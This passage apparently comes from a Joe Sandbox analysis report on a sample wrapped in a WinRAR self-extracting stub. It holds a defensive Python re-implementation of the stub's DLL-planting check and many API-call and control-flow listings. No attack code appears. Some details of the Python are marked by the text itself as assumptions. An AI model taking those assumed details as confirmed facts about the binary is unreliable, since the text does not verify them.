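The function listed above is the start-up check of the SFX stub wrapping this sample (the same module that references winrarsfxmappingfile.tmp and __tmp_rar_sfx_access_check_ in the earlier listing). It resolves SetDllDirectoryW and SetDefaultDllDirectories from kernel32 at run time rather than importing them, then compares file names against DXGIDebug.dll with CompareStringW (dwCmpFlags 00000001, NORM_IGNORECASE) and, on a match, writes "Please remove %s from %s folder. It is unsecure to run %s until it is done." to a freshly allocated console before ExitProcess; uxtheme.dll and dwmapi.dll sit in the same string table. The Python below is an added example that re-implements that DLL-planting pre-check and the search-path hardening; it is not code from the sample, from Joe Sandbox or from WinRAR. The function names, the order of the three %s arguments, the empty-string argument to SetDllDirectoryW, the LOAD_LIBRARY_SEARCH_SYSTEM32 flag and the demo() input are assumptions or constructed.

```python
"""DLL-planting pre-check modelled on the SFX stub listing above.

Added example, not code from the sample, Joe Sandbox or WinRAR.  Names and
the details marked as assumptions are not visible in the listing."""
import os
import tempfile

# DLL names the stub compares against (String ID list of the function).
PLANTED_DLL_NAMES = ("DXGIDebug.dll", "uxtheme.dll", "dwmapi.dll")

# Warning text from the same String ID list.  The order of the three %s
# arguments (dll, folder, exe) is an assumption.
WARNING_FMT = ("Please remove %s from %s folder. "
               "It is unsecure to run %s until it is done.")


def find_planted_dlls(folder, names=PLANTED_DLL_NAMES):
    """Return, in canonical spelling, the watched names present in folder.

    The stub's CompareStringW call passes dwCmpFlags=1 (NORM_IGNORECASE),
    so the comparison is case-insensitive: a planted 'dxgidebug.DLL' still
    hits.  Only regular files count; a directory of that name is not
    loadable and is ignored."""
    wanted = {name.lower(): name for name in names}
    hits = []
    for entry in os.listdir(folder):
        canonical = wanted.get(entry.lower())
        if canonical and os.path.isfile(os.path.join(folder, entry)):
            hits.append(canonical)
    return sorted(hits)


def planting_warning(folder, exe_name, names=PLANTED_DLL_NAMES):
    """Message the stub writes to the console before ExitProcess, or None
    when the folder is clean.  Reporting only the first hit is an
    assumption about the stub's loop."""
    hits = find_planted_dlls(folder, names)
    if not hits:
        return None
    return WARNING_FMT % (hits[0], folder, exe_name)


def harden_dll_search_path():
    """Mirror of the stub's first three calls: resolve SetDllDirectoryW and
    SetDefaultDllDirectories from kernel32 at run time (so the binary still
    starts on Windows builds lacking them) and, when present, remove the
    current directory from the DLL search order and restrict the default
    search path.  The "" argument and the flag value are assumptions; the
    listing shows only the GetProcAddress lookups.  Returns the names of the
    calls made; an empty list off Windows."""
    if os.name != "nt":
        return []
    import ctypes
    k32 = ctypes.WinDLL("kernel32", use_last_error=True)
    made = []
    if hasattr(k32, "SetDllDirectoryW"):
        k32.SetDllDirectoryW(ctypes.c_wchar_p(""))  # drop CWD from search order
        made.append("SetDllDirectoryW")
    if hasattr(k32, "SetDefaultDllDirectories"):
        LOAD_LIBRARY_SEARCH_SYSTEM32 = 0x00000800
        k32.SetDefaultDllDirectories(LOAD_LIBRARY_SEARCH_SYSTEM32)
        made.append("SetDefaultDllDirectories")
    return made


def demo():
    """Constructed input: a temp folder holding a case-varied planted DLL and
    a directory that merely shares a watched name.
    Returns (hits_before, hits_after, warning)."""
    folder = tempfile.mkdtemp(prefix="sfx_check_")
    before = find_planted_dlls(folder)
    with open(os.path.join(folder, "dxgidebug.DLL"), "wb") as fh:
        fh.write(b"MZ")  # placeholder bytes; file content is not inspected
    os.mkdir(os.path.join(folder, "uxtheme.dll"))  # directory: must not count
    after = find_planted_dlls(folder)
    warning = planting_warning(folder, "uhbrQkYNzx.exe")
    return before, after, warning


if __name__ == "__main__":
    print(demo())
    print(harden_dll_search_path())
```

Run as a script it prints the hits before and after planting the file and the warning text; the case-varied name is caught because the comparison, like CompareStringW with NORM_IGNORECASE, folds case, while the directory named uxtheme.dll is skipped.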

                                                              Control-flow Graph

                                                              APIs
                                                                • Part of subcall function 009B0678: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 009B0689
                                                                • Part of subcall function 009B0678: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 009B069A
                                                                • Part of subcall function 009B0678: IsDialogMessageW.USER32(000103EA,?), ref: 009B06AE
                                                                • Part of subcall function 009B0678: TranslateMessage.USER32(?), ref: 009B06BC
                                                                • Part of subcall function 009B0678: DispatchMessageW.USER32(?), ref: 009B06C6
                                                              • GetDlgItem.USER32(00000068,00000000), ref: 009B3595
                                                              • ShowWindow.USER32(00000000,00000005,?,?,?,?,?,?,?,?,?,?,009AFD20,00000001,?,?), ref: 009B35BA
                                                              • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 009B35C9
                                                              • SendMessageW.USER32(00000000,000000C2,00000000,009CC6C8), ref: 009B35D7
                                                              • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 009B35F1
                                                              • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 009B360B
                                                              • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 009B364F
                                                              • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 009B3662
                                                              • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 009B3675
                                                              • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 009B369C
                                                              • SendMessageW.USER32(00000000,000000C2,00000000,009CC860), ref: 009B36AB
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                                                              • String ID: \
                                                              • API String ID: 3569833718-2967466578
                                                              • Opcode ID: d529a614405dd6d726a8d1a9b2be50c77339158356d813e77b30481efa15a931
                                                              • Instruction ID: 51de9e35388f853e9cbac8a427fb5bb215a9871a2a2f10862faf7a34b054c46c
                                                              • Opcode Fuzzy Hash: d529a614405dd6d726a8d1a9b2be50c77339158356d813e77b30481efa15a931
                                                              • Instruction Fuzzy Hash: B231D07125D780BFE310DF20DD89FABBBECEB86715F000519F9519A2A0DB609D058BA7

                                                              Control-flow Graph (interactive graph not reproduced; function body spans basic blocks 9b38a0 through 9b3c14. Nodes on the graph call ShellExecuteExW, IsWindowVisible, ShowWindow, WaitForInputIdle, GetExitCodeProcess and CloseHandle, with a second ShowWindow on the exit path.)
                                                              APIs
                                                              • __EH_prolog3_GS.LIBCMT ref: 009B38A7
                                                              • ShellExecuteExW.SHELL32(?), ref: 009B3AA4
                                                              • IsWindowVisible.USER32(?), ref: 009B3ACF
                                                              • ShowWindow.USER32(?,00000000), ref: 009B3ADD
                                                              • WaitForInputIdle.USER32(?,000007D0), ref: 009B3AED
                                                              • GetExitCodeProcess.KERNEL32(?,?), ref: 009B3B0F
                                                              • CloseHandle.KERNEL32(?), ref: 009B3B33
                                                              • ShowWindow.USER32(?,00000001), ref: 009B3B76
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: Window$Show$CloseCodeExecuteExitH_prolog3_HandleIdleInputProcessShellVisibleWait
                                                              • String ID: .exe$.inf
                                                              • API String ID: 3208621885-3750412487
                                                              • Opcode ID: 6bcd1863959d80d192c3658eb6de5dd658fadf1d6294c9aa64dad89819a81ed3
                                                              • Instruction ID: 356450b68ffd82cf5260dc2f5c5c35fde3a2530bef409ebc1d823a3cdbd16f63
                                                              • Opcode Fuzzy Hash: 6bcd1863959d80d192c3658eb6de5dd658fadf1d6294c9aa64dad89819a81ed3
                                                              • Instruction Fuzzy Hash: 2BB1AD31A14259DFCF21DFA8CA857EDB7B9BF84320F24C119E844AB295DB70AE45CB50

                                                              Control-flow Graph

                                                              control_flow_graph 1052 9b3efc-9b3f11 call 9b57d8 1055 9b3f13 1052->1055 1056 9b3f15-9b3f45 SetEnvironmentVariableW call 9a6366 1052->1056 1055->1056 1058 9b3f4a-9b3f4c 1056->1058 1059 9b3f4e 1058->1059 1060 9b3f8c-9b3f92 1058->1060 1063 9b3f51-9b3f57 1059->1063 1061 9b3fc7-9b3fcc call 9b5787 1060->1061 1062 9b3f94-9b3fa9 1060->1062 1064 9b3fab-9b3fbb call 9919a9 1062->1064 1065 9b3fbe-9b3fc6 call 9b5726 1062->1065 1066 9b3f5b-9b3f67 call 9a6624 1063->1066 1067 9b3f59 1063->1067 1064->1065 1065->1061 1076 9b3f69-9b3f70 1066->1076 1077 9b3f72-9b3f76 1066->1077 1067->1066 1076->1063 1078 9b3f7a-9b3f86 SetEnvironmentVariableW 1077->1078 1079 9b3f78 1077->1079 1078->1060 1079->1078
                                                              APIs
                                                              • __EH_prolog3_GS.LIBCMT ref: 009B3F03
                                                              • SetEnvironmentVariableW.KERNELBASE(sfxcmd,?,?,?,?,?,?,00000028), ref: 009B3F1B
                                                              • SetEnvironmentVariableW.KERNEL32(sfxpar,?,?,?,?,?,?,?,00000028), ref: 009B3F86
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: EnvironmentVariable$H_prolog3_
                                                              • String ID: sfxcmd$sfxpar
                                                              • API String ID: 3605364767-3493335439
                                                              • Opcode ID: c2249795399267ee5b8da8ffa5525ad834fe39872b9749c8f3699ea103da0032
                                                              • Instruction ID: ce5eac1997225632cb9a78de0a16b521f40929c0098670d43529ea4238c46cf6
                                                              • Opcode Fuzzy Hash: c2249795399267ee5b8da8ffa5525ad834fe39872b9749c8f3699ea103da0032
                                                              • Instruction Fuzzy Hash: F5212470D10209DBDF18DFA8EA84AEDBBF9EB49350B50841AF446A7250DB30AA44CF65

                                                              Control-flow Graph

                                                              control_flow_graph 1080 99e180-99e1c9 1081 99e1cb-99e1ce 1080->1081 1082 99e1d4 1080->1082 1081->1082 1083 99e1d0-99e1d2 1081->1083 1084 99e1d6-99e1e6 1082->1084 1083->1084 1085 99e1e8 1084->1085 1086 99e1ee-99e1f8 1084->1086 1085->1086 1087 99e1fa 1086->1087 1088 99e1fd-99e22a 1086->1088 1087->1088 1089 99e22c 1088->1089 1090 99e232-99e238 1088->1090 1089->1090 1091 99e23a 1090->1091 1092 99e23c-99e254 CreateFileW 1090->1092 1091->1092 1093 99e25a-99e28a GetLastError call 9a169a 1092->1093 1094 99e316 1092->1094 1100 99e28c-99e293 1093->1100 1101 99e2be 1093->1101 1096 99e319-99e31c 1094->1096 1098 99e32a-99e32e 1096->1098 1099 99e31e-99e321 1096->1099 1103 99e34f-99e360 1098->1103 1104 99e330-99e333 1098->1104 1099->1098 1102 99e323 1099->1102 1105 99e298-99e2b8 CreateFileW GetLastError 1100->1105 1106 99e295 1100->1106 1108 99e2c1-99e2cb 1101->1108 1102->1098 1109 99e362-99e370 call 9925c3 1103->1109 1110 99e374-99e39a call 991a66 call 9b5734 1103->1110 1104->1103 1107 99e335-99e34c SetFileTime 1104->1107 1105->1101 1111 99e2ba-99e2bc 1105->1111 1106->1105 1107->1103 1112 99e2cd-99e2e2 1108->1112 1113 99e300-99e314 1108->1113 1109->1110 1111->1108 1117 99e2e4-99e2f4 call 9919a9 1112->1117 1118 99e2f7-99e2ff call 9b5726 1112->1118 1113->1096 1117->1118 1118->1113
                                                              APIs
                                                              • CreateFileW.KERNELBASE(?,00000001,00000000,00000000,00000003,08000000,00000000,1AC349C0,?,?,00000000,?,?,00000000,009C9E6B,000000FF), ref: 0099E248
                                                              • GetLastError.KERNEL32(?,?,00000000,009C9E6B,000000FF,?,00000011,?,?,00000000,?,?,?,?,?,?), ref: 0099E25A
                                                              • CreateFileW.KERNEL32(?,00000001,00000000,00000000,00000003,08000000,00000000,?,?,?,?,00000000,009C9E6B,000000FF,?,00000011), ref: 0099E2A6
                                                              • GetLastError.KERNEL32(?,?,00000000,009C9E6B,000000FF,?,00000011,?,?,00000000,?,?,?,?,?,?), ref: 0099E2AF
                                                              • SetFileTime.KERNEL32(00000000,00000000,?,00000000,?,?,00000000,009C9E6B,000000FF,?,00000011,?,?,00000000,?,?), ref: 0099E346
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: File$CreateErrorLast$Time
                                                              • String ID:
                                                              • API String ID: 1999340476-0
                                                              • Opcode ID: 83375201239fc8136460a63aca2c070ed0733cf05d7f90881aeffbaf79fd0e9a
                                                              • Instruction ID: 4afe2aff3a2a15c447f8371517e6f810b697d00ef061c9e06f7fe8b928bf2f0a
                                                              • Opcode Fuzzy Hash: 83375201239fc8136460a63aca2c070ed0733cf05d7f90881aeffbaf79fd0e9a
                                                              • Instruction Fuzzy Hash: D0617F71D14249DFDF24CF68D986BEE7BA8FF08314F204619F82597281D774A944CB94

                                                              Control-flow Graph

                                                              control_flow_graph 1126 9a74ec-9a7536 call 9a77cf ReleaseSemaphore 1129 9a7538 1126->1129 1130 9a7556-9a758a DeleteCriticalSection CloseHandle * 2 1126->1130 1131 9a753b-9a7554 call 9a75ed CloseHandle 1129->1131 1131->1130
                                                              APIs
                                                                • Part of subcall function 009A77CF: ResetEvent.KERNEL32(?,?,?,?,?,?,?,?,00000004,009973B8), ref: 009A77E1
                                                                • Part of subcall function 009A77CF: ReleaseSemaphore.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,00000004,009973B8), ref: 009A77F5
                                                              • ReleaseSemaphore.KERNEL32(?,00000040,00000000,1AC349C0,?,?,00000001,00000000,009CA603,000000FF,?,009A90B9,?,?,00995630,?), ref: 009A752A
                                                              • CloseHandle.KERNELBASE(?,?,?,009A90B9,?,?,00995630,?,?,?,00000000,?,?,?,00000001,?), ref: 009A7544
                                                              • DeleteCriticalSection.KERNEL32(?,?,009A90B9,?,?,00995630,?,?,?,00000000,?,?,?,00000001,?,?), ref: 009A755D
                                                              • CloseHandle.KERNEL32(?,?,009A90B9,?,?,00995630,?,?,?,00000000,?,?,?,00000001,?,?), ref: 009A7569
                                                              • CloseHandle.KERNEL32(?,?,009A90B9,?,?,00995630,?,?,?,00000000,?,?,?,00000001,?,?), ref: 009A7575
                                                                • Part of subcall function 009A75ED: WaitForSingleObject.KERNEL32(?,000000FF,009A770A,?,?,009A777F,?,?,?,?,?,009A7769), ref: 009A75F3
                                                                • Part of subcall function 009A75ED: GetLastError.KERNEL32(?,?,009A777F,?,?,?,?,?,009A7769), ref: 009A75FF
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                                                              • String ID:
                                                              • API String ID: 1868215902-0
                                                              • Opcode ID: a8568b4eaad83264f81755647e0d381270cd1e3d9a1269b2d8108189a6d14e83
                                                              • Instruction ID: 4355065b16ece73a22310548b3a1b20095b090df561519286d43f7e0f25bd337
                                                              • Opcode Fuzzy Hash: a8568b4eaad83264f81755647e0d381270cd1e3d9a1269b2d8108189a6d14e83
                                                              • Instruction Fuzzy Hash: 7111C4B2808704EFC722DFA4DC85FC6FBA9FB09750F00492AF15A92160CB71A941DBA4

                                                              Control-flow Graph

                                                              control_flow_graph 1134 9b0678-9b0691 PeekMessageW 1135 9b06cc-9b06ce 1134->1135 1136 9b0693-9b06a7 GetMessageW 1134->1136 1137 9b06a9-9b06b6 IsDialogMessageW 1136->1137 1138 9b06b8-9b06c6 TranslateMessage DispatchMessageW 1136->1138 1137->1135 1137->1138 1138->1135
                                                              APIs
                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 009B0689
                                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 009B069A
                                                              • IsDialogMessageW.USER32(000103EA,?), ref: 009B06AE
                                                              • TranslateMessage.USER32(?), ref: 009B06BC
                                                              • DispatchMessageW.USER32(?), ref: 009B06C6
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: Message$DialogDispatchPeekTranslate
                                                              • String ID:
                                                              • API String ID: 1266772231-0
                                                              • Opcode ID: 710b44df428f54bf3d6f1a64b5ab7573903de055786d6a5a11cc07a378cd9d75
                                                              • Instruction ID: 36abb8eaf2c13ebe38afe6b8b3978f81f912ee5310ae3bda954ba71e7ea2b798
                                                              • Opcode Fuzzy Hash: 710b44df428f54bf3d6f1a64b5ab7573903de055786d6a5a11cc07a378cd9d75
                                                              • Instruction Fuzzy Hash: 9AF054B1D1A25AABCF20ABE2EC8CEDBBFBCEE452A17004410F506D2010E724D905DBF1

                                                              Control-flow Graph

                                                              control_flow_graph 1139 9b2813-9b2845 call 997673 1142 9b284a-9b2850 1139->1142 1143 9b2847 1139->1143 1144 9b2abd 1142->1144 1145 9b2856-9b285b 1142->1145 1143->1142 1148 9b2abf-9b2ac3 1144->1148 1146 9b285d 1145->1146 1147 9b2860-9b286e 1145->1147 1146->1147 1149 9b2870-9b287c 1147->1149 1150 9b2896 1147->1150 1151 9b2ace-9b2ad2 1148->1151 1152 9b2ac5-9b2ac8 1148->1152 1149->1150 1153 9b287e 1149->1153 1154 9b2899-9b289c 1150->1154 1156 9b2af7 1151->1156 1157 9b2ad4-9b2ad7 1151->1157 1155 9b2aca-9b2acc 1152->1155 1152->1156 1158 9b2884-9b2888 1153->1158 1159 9b28a2-9b28a7 1154->1159 1160 9b2ab7 1154->1160 1161 9b2ada-9b2af2 call 997673 call 9b38a0 1155->1161 1163 9b34ad-9b3500 call 9958cb 1156->1163 1157->1156 1162 9b2ad9 1157->1162 1164 9b288e-9b2894 1158->1164 1165 9b29f0-9b29f2 1158->1165 1166 9b28a9 1159->1166 1167 9b28ac-9b28d7 call 9bacee call 991afc 1159->1167 1160->1144 1161->1156 1162->1161 1178 9b3502 1163->1178 1179 9b3504-9b3514 call 9a0d1d 1163->1179 1164->1150 1164->1158 1165->1150 1169 9b29f8-9b29fc 1165->1169 1166->1167 1167->1163 1182 9b28dd-9b28e1 1167->1182 1169->1154 1178->1179 1188 9b356a-9b356f call 9b5787 1179->1188 1189 9b3516-9b351c 1179->1189 1183 9b28e3 1182->1183 1184 9b28e5-9b28ec 1182->1184 1183->1184 1186 9b28ee 1184->1186 1187 9b28f1-9b292f call 99120c call 9a645a 1184->1187 1186->1187 1205 9b2935-9b2937 1187->1205 1192 9b351e 1189->1192 1193 9b3520-9b3526 1189->1193 1192->1193 1196 9b3528-9b3531 call 9a13da 1193->1196 1197 9b3533-9b3565 call 999733 call 991150 call 9925a4 call 991a66 * 2 1193->1197 1196->1188 1196->1197 1197->1188 1207 9b293d-9b299f call 9914a7 call 99adaa call 991a66 call 9914a7 call 99adaa call 991a66 1205->1207 1208 9b2a01-9b2a07 1205->1208 1242 9b29a1-9b29a3 1207->1242 1243 9b29a4-9b29d2 call 9914a7 call 99adaa call 991a66 1207->1243 1210 9b2a09-9b2a24 1208->1210 1211 9b2a4e-9b2a68 1208->1211 1214 9b2a26-9b2a3f call 9919a9 1210->1214 1215 
9b2a45-9b2a4d call 9b5726 1210->1215 1217 9b2a6a-9b2a85 1211->1217 1218 9b2aaf-9b2ab5 1211->1218 1214->1215 1215->1211 1223 9b2a87-9b2aa0 call 9919a9 1217->1223 1224 9b2aa6-9b2aae call 9b5726 1217->1224 1218->1148 1223->1224 1224->1218 1242->1243 1250 9b29d7-9b29eb call 9a645a 1243->1250 1251 9b29d4-9b29d6 1243->1251 1250->1205 1251->1250
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: _wcslen
                                                              • String ID: HIDE$MAX$MIN
                                                              • API String ID: 176396367-2426493550
                                                              • Opcode ID: 2166a92c22296d106ac75ef1d76fb8154757e6a4b09c1e1b81ee6a9954594cee
                                                              • Instruction ID: 02c046b3d76544c02181c30bb18d5fabfb24803e6e7272e02892a37efab96e36
                                                              • Opcode Fuzzy Hash: 2166a92c22296d106ac75ef1d76fb8154757e6a4b09c1e1b81ee6a9954594cee
                                                              • Instruction Fuzzy Hash: 8AB1AE71C00259DACF25DBA8CD85BDDBBB8FF89320F14059AE404B7181DB74AE89CB51

                                                              Control-flow Graph

                                                              control_flow_graph 1254 9af2ce-9af2f7 GetClassNameW 1255 9af2f9-9af30e call 9a8da4 1254->1255 1256 9af31f-9af321 1254->1256 1262 9af31e 1255->1262 1263 9af310-9af31c FindWindowExW 1255->1263 1258 9af32c-9af338 call 9b5734 1256->1258 1259 9af323-9af326 SHAutoComplete 1256->1259 1259->1258 1262->1256 1263->1262
                                                              APIs
                                                              • GetClassNameW.USER32(?,?,00000050), ref: 009AF2EF
                                                              • SHAutoComplete.SHLWAPI(?,00000010), ref: 009AF326
                                                                • Part of subcall function 009A8DA4: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,000000FF,009A0E3F,?,?,?,00000046,009A1ECE,00000046,?,exe,00000046), ref: 009A8DBA
                                                              • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 009AF316
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: AutoClassCompareCompleteFindNameStringWindow
                                                              • String ID: EDIT
                                                              • API String ID: 4243998846-3080729518
                                                              • Opcode ID: 39946397e3fb355d1319c95ce273d4ceadc140e728f5e6aa71b940deeb069dca
                                                              • Instruction ID: 957e0976d647547dff4f90a517a0bc2259d1828345e188fafa4180179eecc657
                                                              • Opcode Fuzzy Hash: 39946397e3fb355d1319c95ce273d4ceadc140e728f5e6aa71b940deeb069dca
                                                              • Instruction Fuzzy Hash: 8EF0C831705218ABDF20AB649D45FDFB7AC9F86B51F010065B900EB1C0DA70AE0596A9

                                                              Control-flow Graph

                                                              APIs
                                                                • Part of subcall function 009A6C5E: __EH_prolog3_GS.LIBCMT ref: 009A6C65
                                                                • Part of subcall function 009A6C5E: GetSystemDirectoryW.KERNEL32(00000000,00000104), ref: 009A6C9A
                                                              • OleInitialize.OLE32(00000000), ref: 009AF4ED
                                                              • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 009AF524
                                                              • SHGetMalloc.SHELL32(009E532C), ref: 009AF52E
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: DirectoryGdiplusH_prolog3_InitializeMallocStartupSystem
                                                              • String ID: riched20.dll
                                                              • API String ID: 2446841611-3360196438
                                                              • Opcode ID: d3f76acc5f95ce11f4646daa74cdfdb4c82d876b7d44b4582c907bb72f02ed4e
                                                              • Instruction ID: 985d16394f35796ba044fa332f3e024976e5006a164e86466da663f2b1eb45a7
                                                              • Opcode Fuzzy Hash: d3f76acc5f95ce11f4646daa74cdfdb4c82d876b7d44b4582c907bb72f02ed4e
                                                              • Instruction Fuzzy Hash: 02F049B1C04209ABCB10AF99C849AEEFBFCEF84305F00405AE401E2240D7B85A058BA1

                                                              Control-flow Graph

